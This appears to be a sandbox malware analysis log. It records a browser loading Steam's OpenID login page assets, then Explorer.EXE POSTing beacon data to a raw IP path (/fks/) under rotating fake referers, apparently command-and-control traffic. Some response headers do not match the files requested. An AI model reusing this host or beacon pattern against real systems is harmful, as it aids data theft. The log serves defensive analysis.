https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/images/header/logo_steam.svg?t=962016 HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:18 GMT
content-type: text/javascript;charset=UTF-8
content-length: 149314
cache-control: public,max-age=15552000
expires: Sun, 21 Apr 2024 22:54:45 GMT
etag: "rbXLcPTwYuVa"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
x-cache: MISS
cf-cache-status: HIT
age: 460409
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b63dfb0e0bdc-AMS
GET

https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=2GlUT7rXfQte&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/css/applications/community/main.css?v=2GlUT7rXfQte&l=english&_cdn=cloudflare HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:18 GMT
content-type: image/png
content-length: 1846
last-modified: Fri, 05 Jan 2018 01:35:16 GMT
etag: "5a4ed654-736"
x-cache: MISS
cf-cache-status: HIT
age: 5146
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b63dfaf60bdc-AMS
GET

https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=EzpNioPgQ-Tc&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/applications/community/manifest.js?v=EzpNioPgQ-Tc&l=english&_cdn=cloudflare HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:18 GMT
content-type: text/javascript;charset=UTF-8
content-length: 205353
cache-control: public,max-age=15552000
expires: Sun, 21 Apr 2024 22:54:46 GMT
etag: "g2KJQjzin8s0"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
x-cache: MISS
cf-cache-status: HIT
age: 460409
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b63dfb0a0bdc-AMS
GET

https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b7af69.js?v=g2KJQjzin8s0&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/applications/community/libraries~b28b7af69.js?v=g2KJQjzin8s0&l=english&_cdn=cloudflare HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:18 GMT
content-type: image/png
content-length: 10863
last-modified: Fri, 05 Jan 2018 01:35:16 GMT
etag: "5a4ed654-2a6f"
x-cache: MISS
cf-cache-status: HIT
age: 3292
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b63dfafe0bdc-AMS
GET

https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=rbXLcPTwYuVa&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/applications/community/main.js?v=rbXLcPTwYuVa&l=english&_cdn=cloudflare HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:18 GMT
content-type: image/png
content-length: 3777
last-modified: Fri, 05 Jan 2018 01:35:16 GMT
etag: "5a4ed654-ec1"
x-cache: MISS
cf-cache-status: HIT
age: 2196
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b63dfafb0bdc-AMS
GET

https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/images/skin_1/footerLogo_valve.png?v=1 HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:18 GMT
content-type: image/svg+xml
last-modified: Tue, 17 Nov 2020 23:34:54 GMT
etag: W/"5fb45e1e-e64"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 2072
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b63dfb010bdc-AMS
content-encoding: gzip
GET

https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Regular.ttf?v=4.015

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/fonts/MotivaSans-Regular.ttf?v=4.015 HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://steamcommunity.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:31 GMT
content-type: application/octet-stream
content-length: 122684
last-modified: Tue, 28 Jul 2020 23:16:28 GMT
etag: "5f20b1cc-1df3c"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 3017
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b68bcf850bdc-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Light.ttf?v=4.015

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/fonts/MotivaSans-Light.ttf?v=4.015 HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://steamcommunity.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:31 GMT
content-type: application/octet-stream
content-length: 122660
last-modified: Tue, 28 Jul 2020 23:16:28 GMT
etag: "5f20b1cc-1df24"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 4480
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b68f29dc0bdc-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Thin.ttf?v=4.015

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/fonts/MotivaSans-Thin.ttf?v=4.015 HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://steamcommunity.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:32 GMT
content-type: application/octet-stream
content-length: 118736
last-modified: Tue, 28 Jul 2020 23:16:27 GMT
etag: "5f20b1cb-1cfd0"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 5750
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6904af10bdc-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Medium.ttf?v=4.015

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/fonts/MotivaSans-Medium.ttf?v=4.015 HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://steamcommunity.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:32 GMT
content-type: application/octet-stream
content-length: 124048
last-modified: Tue, 28 Jul 2020 23:16:28 GMT
etag: "5f20b1cc-1e490"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 7172
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b692dcbe0bdc-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Bold.ttf?v=4.015

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/fonts/MotivaSans-Bold.ttf?v=4.015 HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://steamcommunity.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:32 GMT
content-type: application/octet-stream
content-length: 123884
last-modified: Tue, 28 Jul 2020 23:16:27 GMT
etag: "5f20b1cb-1e3ec"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 5346
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6947dd10bdc-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-RegularItalic.ttf?v=4.015

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/fonts/MotivaSans-RegularItalic.ttf?v=4.015 HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://steamcommunity.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:32 GMT
content-type: application/octet-stream
content-length: 135500
last-modified: Tue, 28 Jul 2020 23:16:28 GMT
etag: "5f20b1cc-2114c"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 7066
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b694ee0d0bdc-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-LightItalic.ttf?v=4.015

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/fonts/MotivaSans-LightItalic.ttf?v=4.015 HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://steamcommunity.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:33 GMT
content-type: application/octet-stream
content-length: 133600
last-modified: Tue, 28 Jul 2020 23:16:28 GMT
etag: "5f20b1cc-209e0"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 840
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b697bfd20bdc-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-BoldItalic.ttf?v=4.015

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/fonts/MotivaSans-BoldItalic.ttf?v=4.015 HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://steamcommunity.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:33 GMT
content-type: application/octet-stream
content-length: 134500
last-modified: Tue, 28 Jul 2020 23:16:27 GMT
etag: "5f20b1cb-20d64"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 3016
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b69858650bdc-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Black.ttf?v=4.015

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/fonts/MotivaSans-Black.ttf?v=4.015 HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://steamcommunity.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:33 GMT
content-type: application/octet-stream
content-length: 120816
last-modified: Tue, 28 Jul 2020 23:16:27 GMT
etag: "5f20b1cb-1d7f0"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 806
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b698d8be0bdc-AMS
GET

https://community.cloudflare.steamstatic.com/public/javascript/applications/community/localization/shared_english-json.js?contenthash=7b917bcf42abcf2ea66b

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/applications/community/localization/shared_english-json.js?contenthash=7b917bcf42abcf2ea66b HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:41 GMT
content-type: text/javascript;charset=UTF-8
last-modified: Tue, 24 Oct 2023 22:53:30 GMT
cache-control: public,max-age=15552000
expires: Sun, 21 Apr 2024 22:54:46 GMT
x-cache: MISS
cf-cache-status: HIT
age: 460434
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6cc7f630bdc-AMS
content-encoding: gzip
GET

https://community.cloudflare.steamstatic.com/public/javascript/applications/community/localization/sales_english-json.js?contenthash=66fa680c5f641af586b2

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/applications/community/localization/sales_english-json.js?contenthash=66fa680c5f641af586b2 HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:43 GMT
content-type: text/javascript;charset=UTF-8
last-modified: Tue, 10 Oct 2023 22:56:10 GMT
cache-control: public,max-age=15552000
expires: Sun, 07 Apr 2024 22:57:22 GMT
x-cache: MISS
cf-cache-status: HIT
age: 1669880
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6d60ec70bdc-AMS
content-encoding: gzip
GET

https://community.cloudflare.steamstatic.com/public/javascript/applications/community/localization/main_english-json.js?contenthash=1677c4549d6264782145

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/applications/community/localization/main_english-json.js?contenthash=1677c4549d6264782145 HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:43 GMT
content-type: text/javascript;charset=UTF-8
last-modified: Tue, 24 Oct 2023 22:53:30 GMT
cache-control: public,max-age=15552000
expires: Sun, 21 Apr 2024 22:54:46 GMT
edge-control: !no-store,!bypass-cache,max-age=15552000
x-cache: HIT
cf-cache-status: HIT
age: 460436
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6d68f4d0bdc-AMS
content-encoding: gzip
GET

https://community.cloudflare.steamstatic.com/public/shared/images/login/code_box.png?v=1

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/images/login/code_box.png?v=1 HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:43 GMT
content-type: image/png
content-length: 3297
last-modified: Fri, 05 Jan 2018 01:35:16 GMT
etag: "5a4ed654-ce1"
x-cache: MISS
cf-cache-status: HIT
age: 630
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6d919290bdc-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/images/login/friendlyname_box.png?v=1

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/images/login/friendlyname_box.png?v=1 HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:43 GMT
content-type: image/png
content-length: 3196
last-modified: Fri, 05 Jan 2018 01:35:16 GMT
etag: "5a4ed654-c7c"
x-cache: MISS
cf-cache-status: HIT
age: 630
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6d9494a0bdc-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/images/joinsteam/new_login_bg_strong_mask.jpg

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/images/joinsteam/new_login_bg_strong_mask.jpg HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:43 GMT
content-type: image/jpeg
content-length: 124529
cf-bgj: h2pri
etag: "63056bdf-1e671"
last-modified: Wed, 24 Aug 2022 00:07:59 GMT
x-cache: MISS
cf-cache-status: HIT
age: 630
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6d989910bdc-AMS
GET

https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~f036ce556.js?contenthash=56426a5e1bb62f4487d1

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/applications/community/libraries~f036ce556.js?contenthash=56426a5e1bb62f4487d1 HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:45 GMT
content-type: text/javascript;charset=UTF-8
last-modified: Tue, 26 Sep 2023 22:36:31 GMT
cache-control: public,max-age=15552000
expires: Sun, 24 Mar 2024 22:37:59 GMT
x-cache: HIT
cf-cache-status: HIT
age: 2880644
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6e64a520bdc-AMS
content-encoding: gzip
GET

https://community.cloudflare.steamstatic.com/public/javascript/applications/community/chunk~0012678b1.js?contenthash=84f282c00660307da92a

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/applications/community/chunk~0012678b1.js?contenthash=84f282c00660307da92a HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:46 GMT
content-type: text/javascript;charset=UTF-8
last-modified: Tue, 26 Sep 2023 22:36:31 GMT
cache-control: public,max-age=15552000
expires: Sun, 24 Mar 2024 22:37:59 GMT
edge-control: !no-store,!bypass-cache,max-age=15552000
x-cache: HIT
cf-cache-status: HIT
age: 2880645
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6ea1d790bdc-AMS
content-encoding: gzip
GET

https://community.cloudflare.steamstatic.com/public/css/applications/community/chunk~f036ce556.css?contenthash=abbdd20a2e9abb001e29

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/css/applications/community/chunk~f036ce556.css?contenthash=abbdd20a2e9abb001e29 HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:48 GMT
content-type: text/css;charset=UTF-8
last-modified: Tue, 10 Oct 2023 22:56:04 GMT
cache-control: public,max-age=15552000
expires: Sun, 07 Apr 2024 22:57:22 GMT
edge-control: !no-store,!bypass-cache,max-age=15552000
x-cache: HIT
cf-cache-status: HIT
age: 1669878
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6f7e8d60bdc-AMS
content-encoding: gzip
GET

https://community.cloudflare.steamstatic.com/public/javascript/applications/community/chunk~f036ce556.js?contenthash=ac03edb408dbe839c029

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/applications/community/chunk~f036ce556.js?contenthash=ac03edb408dbe839c029 HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:50 GMT
content-type: text/javascript;charset=UTF-8
last-modified: Tue, 10 Oct 2023 22:56:04 GMT
cache-control: public,max-age=15552000
expires: Sun, 07 Apr 2024 22:57:22 GMT
edge-control: !no-store,!bypass-cache,max-age=15552000
x-cache: HIT
cf-cache-status: HIT
age: 1669880
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b701d90e0bdc-AMS
content-encoding: gzip
GET

https://community.cloudflare.steamstatic.com/public/css/applications/community/login.css?contenthash=120ef11d3786830c5571

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/css/applications/community/login.css?contenthash=120ef11d3786830c5571 HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:51 GMT
content-type: text/css;charset=UTF-8
last-modified: Wed, 24 Aug 2022 20:34:39 GMT
cache-control: public,max-age=15552000
expires: Sat, 19 Aug 2023 20:35:42 GMT
edge-control: !no-store,!bypass-cache,max-age=15552000
x-cache: HIT
cf-cache-status: HIT
age: 14605049
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b70a3f8f0bdc-AMS
content-encoding: gzip
GET

https://community.cloudflare.steamstatic.com/public/javascript/applications/community/login.js?contenthash=9567e17c46c30d2a2a6f

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/applications/community/login.js?contenthash=9567e17c46c30d2a2a6f HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:54 GMT
content-type: text/javascript;charset=UTF-8
last-modified: Tue, 26 Sep 2023 22:36:31 GMT
cache-control: public,max-age=15552000
expires: Sun, 24 Mar 2024 22:38:01 GMT
x-cache: MISS
cf-cache-status: HIT
age: 2880632
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b71d1f2c0bdc-AMS
content-encoding: gzip
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://xgwnapgkb.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 301
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 30 Oct 2023 06:48:17 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://oduib.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 163
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 30 Oct 2023 06:48:17 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://kyxrn.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 341
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 30 Oct 2023 06:48:18 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
